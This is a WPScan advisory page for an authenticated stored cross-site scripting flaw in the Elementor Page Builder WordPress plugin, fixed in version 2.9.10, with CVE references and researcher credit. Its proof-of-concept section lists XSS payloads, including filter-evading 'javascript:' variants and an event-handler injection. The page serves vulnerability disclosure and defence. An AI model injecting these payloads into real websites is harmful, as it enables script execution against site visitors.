WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Elementor Page Builder < 2.9.10 - Authenticated Stored XSS

Description

The Elementor Page Builder plugin is susceptible to stored XSS. An author user can create custom links containing XSS payloads or apply custom attributes to widgets which results in XSS.

Proof of Concept

javascript:alert(1), JaVaScript:alert(1), javas	cript:alert(1)

<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>

Affects Plugins

elementor
Fixed in version 2.9.10

References

CVE
CVE-2020-13864
CVE
CVE-2020-13865
URL
https://www.softwaresecured.com/elementor-page-builder-stored-xss/

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Jeremy Buis

Submitter

Jeremy Buis

Submitter twitter
jeremybuis
Verified

No

WPVDB ID
31659b56-2046-4be8-887f-a016da138595

Timeline

Publicly Published

2020-06-05 (about 2 years ago)

Added

2020-06-05 (about 2 years ago)

Last Updated

2020-06-06 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin